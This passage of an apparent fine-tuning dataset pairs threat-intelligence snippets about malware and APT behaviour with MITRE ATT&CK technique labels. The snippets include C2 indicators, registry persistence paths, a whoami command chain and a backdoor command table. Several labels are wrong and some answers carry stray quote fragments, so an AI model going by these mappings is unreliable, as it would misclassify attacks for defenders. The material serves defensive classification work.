- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt ."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Invoke-Mimikatz.ps1 is the PowerShell implementation of Mimikatz. The PowerShell script loads Mimikatz.exe reflectively into the process memory."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The same code snippets are combined into a second stage JavaScript in “C:\\Users\\\\”"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing. However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "binds and listens on port 1058."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned in the table above, version 3 has two forms - one is an independent executable, and the other is a loader that loads a DLL from the resources section and executes it. Even before doing any static / dynamic analysis, we can use VirusTotal to determine that the resources section probably contains more data, in this case an encrypted DLL that is loaded into memory"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One variant of CloudDuke uses a Microsoft OneDrive account to exchange commands and stolen data with its operators."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has used \"ProcessWindowStyle.Hidden\" to hide windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has stolen legitimate certificates to sign malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1588.003 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We can also see files created in a TEMP folder that are serving as a small database, where Dyreza stores information, before they are sent to the C&C"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The started command will send the following information to the C&C: device_model: the model identifier (e.g.: MacBookPro9,2) bot_version: version of Keydnap build_name: the “build name” that was given by downloader os_version: OS X or macOS kernel version ip_address: external IP address as reported by ipify.org has_root: 1 if executed as root, 0 otherwise Backdoor commands The response to get_task contains an integer to identify the type of command and optional arguments"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has used rundll32.exe for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A separate communication channel is created for each installed module. The communication protocol used is TLS over TCP. The communication is handled with the HP-Socket library. All the messages are RC4 encrypted using the hardcoded key. If the size of the message to be transferred is greater than or equal to 4KB, it is first compressed using zlib’s Deflate implementation"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpicyOmelette has been executed through malicious links within spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates with its C2 servers over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy can gather extended system information, such as information about the operating system, disks, and memory."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The inclusion of both phone and IMSI numbers show the highly targeted nature of this cyber intrusion. If an SMS message contained either a phone number or an IMSI number that matched the predefined list, it was saved to a CSV file for later theft by the threat actor"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can sniff network traffic to look for packets matching specific conditions."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has been delivered via spearphishing e-mails with password protected ZIP files."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following initial access, GRIM SPIDER focuses on collecting credentials from the compromised hosts and uses existing RDP in an attempt to get a domain administrator account and access to the Windows Domain Controller. This process can take several iterations of harvesting credentials, connecting to new systems and establishing persistence"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ‘jli.dll’ file acts as the first layer of the Ecipekac loader. This DLL file has a number of export functions; however, all of them refer to a similar function that carries the main loading feature"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of spawning a Windows command shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Poseidon Group's Information Gathering Tool (IGT) includes PowerShell components."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Remexi, one of the malware in use by Chafer, had the following command and control host: 87pqxz159.dockerjsbin[.]com Interestingly, IP address 83.142.230.138, which serve as a command and control address for an OilRig related sample (3a5fcba80c1fd685c4b5085d9d474118), was pointed to by 87pqxz159.dockerjsbin[.]com as well"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules. Once the document was opened, it prompted the user to enable the macro titled \"BlackWater.bas\"."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has established persistence by setting the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run key value for wdm to the path of the executable. It has also used the Registry entry HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn “%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe” to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used spearphishing emails with malicious Microsoft Word attachments to infect victims."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Analysis of BRONZE BUTLER's operations, targeting, and capability led CTU researchers to assess that it is likely that the group is located in the PRC. The group has used spearphishing, strategic web compromises (SWCs), and an exploit of a zero-day vulnerability to compromise targeted systems. After exfiltrating targeted data from a network, BRONZE BUTLER typically deletes evidence of its activities. However, it maintains access to compromised environments when possible, periodically revisiting compromised sites to identify new opportunities for data exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has the capability to download files to execute on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla has been deployed as `w64time.dll` to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream has the ability to gather user information from the targeted system using `whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ajax Security Team has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rancor has used cmd.exe to execute commmands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As is evident here, the SSH server will accept connections on port number 6789. By running SSH on the server in a compromised network, attackers can come back to the network whenever they want"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We suspect that the malware uses this extension to grab the victim’s cookies and use them from another device to ride the victim’s active session"
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command IDDescription 0Uninstall Keydnap and quit 1Update the backdoor from a base64-encoded file 2Update the backdoor given a URL 3Decode and execute a base64-encoded file 4Decode and execute a base64-encoded Python script 5Download and execute a file from a URL 6Download and execute a Python script from a URL 7Execute a command and report the output back to the C&C server 8Request administrator privileges the next time the user runs an application 9Decode and execute, or stop, a base64-encoded file calledauthd_service The last two commands stand out"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1132 - Data Encoding', 'T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to compromise on-premises versions of Microsoft Exchange Server, enabling access to email accounts and installation of additional malware."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can upload, download, and execute files on the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has been known to create or enable accounts, such as \"support_388945a0\"."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer."
- },
- {
- "role": "assistant",
- "content": "T1565.002 - Transmitted Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can determine if an anti-virus product is installed through the resolution of the service's virtual SID."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet infected WinCC machines via a hardcoded database server password."
- },
- {
- "role": "assistant",
- "content": "T1078.001 - Valid Accounts: Default Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has used regsvr32.exe to execute components of VirtualBox."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most of the infected sites use the TYPO3 CMS (see: https://typo3.org/), which could indicate the attackers are abusing a specific vulnerability in this publishing platform"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Due to its complex infection process that relies in part on registry updates with malware code, Valak can easily infect an unprotected Windows host. With ADS used to hide follow-up malware from a Valak infection, the risk is greatly increased"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sends an OS version identifier in its beacons."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "root/.ssh/{id_rsa, id_rsa.pub} – the SSH pair key used to update the miner from the C&C server using SCP. opt/{bootsync.sh, bootlocal.sh} – the system startup commands that try to update the miner from the C&C server and run it (see Scripts 7 and 8"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 used a Trojan called KEYLIME to collect data from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can access the webcam on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used VBScript to initiate the delivery of payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography', 'T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
